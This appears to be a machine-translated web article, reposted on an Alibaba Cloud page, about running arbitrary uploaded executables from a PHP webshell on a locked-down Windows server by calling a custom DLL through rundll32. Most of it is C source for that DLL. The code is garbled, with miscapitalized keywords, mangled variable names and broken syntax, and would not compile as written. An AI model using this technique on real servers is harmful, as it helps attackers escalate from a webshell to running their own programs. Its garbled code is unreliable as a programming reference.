Execute exe using rundll32 in webshell

Source: Internet
Author: User

Abstract: For a web shell, the system permissions are well set, and common exe files do not have permission to be executed. The exe file that can be uploaded to the writable directory does not have the execution permission. Rundll32.exe is missing when the permission is set. If so, this code is written.

At the beginning of the test, PHP does not seem to have the right to execute the command. I was planning to use some of the overflow problems of php itself to overflow a low-privilege shell. Later, it was unexpectedly discovered that using the proc_open function could execute some internal commands, but the external commands and directories both had strict permission settings. In this case, only the external commands that can be used are tested. The rundll32.exe program is tested at the end of the test, and at last the response permission is insufficient. Write a dll and call rundll32 to execute any self-uploaded exe file. Maybe it's a small problem with windows permissions? After all, the identity of the exe indirectly executed by rundll32 is still the guest permission of the php shell, although the caller has changed-the real reason remains to be further studied.

#
/*************************************** **************************************** ******************
#
* When a server permission is very malformed, the system's exe cannot be executed, and the self-uploaded exe cannot be executed in a writable directory.
#
* The root cause is that they have missed the permission for the rundll32.exe file ......
#
* Code by wustyunshu ### hotmail.com,: 20
#
**************************************** **************************************** *****************/
#

#
# Include <stdio. h>
#
# Include <stdlib. h>
#
# Include <windows. h>
#

#
// Dll entry
#
Bool apientry DllMain (HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
#
{
#
Return true;
#
}
#

#
Void RunExe (HWND hwnd, HINSTANCE hinst, LPSTR sz1_line, int nCmdShow)
#
{
#
If (sz1_line = NULL)
#
{
#
Return;
#
}
#

#
DWORD dwNum = MultiByteToWideChar (CP_ACP, 0, sz1_line,-1, NULL, 0 );
#
Wchar_t * wsz1_line = new wchar_t [dwNum];
#
If (! WszCmdLine)
#
{
#
Return;
#
}
#
MultiByteToWideChar (CP_ACP, 0, sz1_line,-1, wsz1_line, dwNum );
#

#
Int argc;
#
LPWSTR * argv = CommandLineToArgvW (wsz1_line, & argc );
#

#
Wchar_t Cmd [256] = {0 };
#
Wchar_t Args [1024] = {0 };
#

#
// Strncpy (Cmd, argv [0], sizeof (Cmd)-1 );
#
Wcsncpy (Cmd, argv [0], sizeof (Cmd)-1 );
#
If (argc> 1)
#
{
#
For (int index = 1; index <argc; index ++)
#
{
#
Wcscat (Args, L ""), argv [index]);
#
}
#
}
#

#
STARTUPINFO si;
#
Memset (void *) & si, 0, sizeof (STARTUPINFOA ));
#
GetStartupInfoW (& si );
#

#
// New process input/output redirection
#
Si. cb = sizeof (si );
#
Si. dwFlags = STARTF_USESHOWWINDOW;
#
// Si. wShowWindow = SW_HIDE;
#

#
PROCESS_INFORMATION processInfo;
#
Memset (void *) & processInfo, 0, sizeof (PROCESS_INFORMATION ));
#

#
// Create a process
#
CreateProcessW (Cmd, Args, NULL, NULL, 1, 0, NULL, NULL, & si, & processInfo );
#

#
Sleep (60*1000 );
#
TerminateProcess (processInfo. hProcess, 0 );
#
}

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.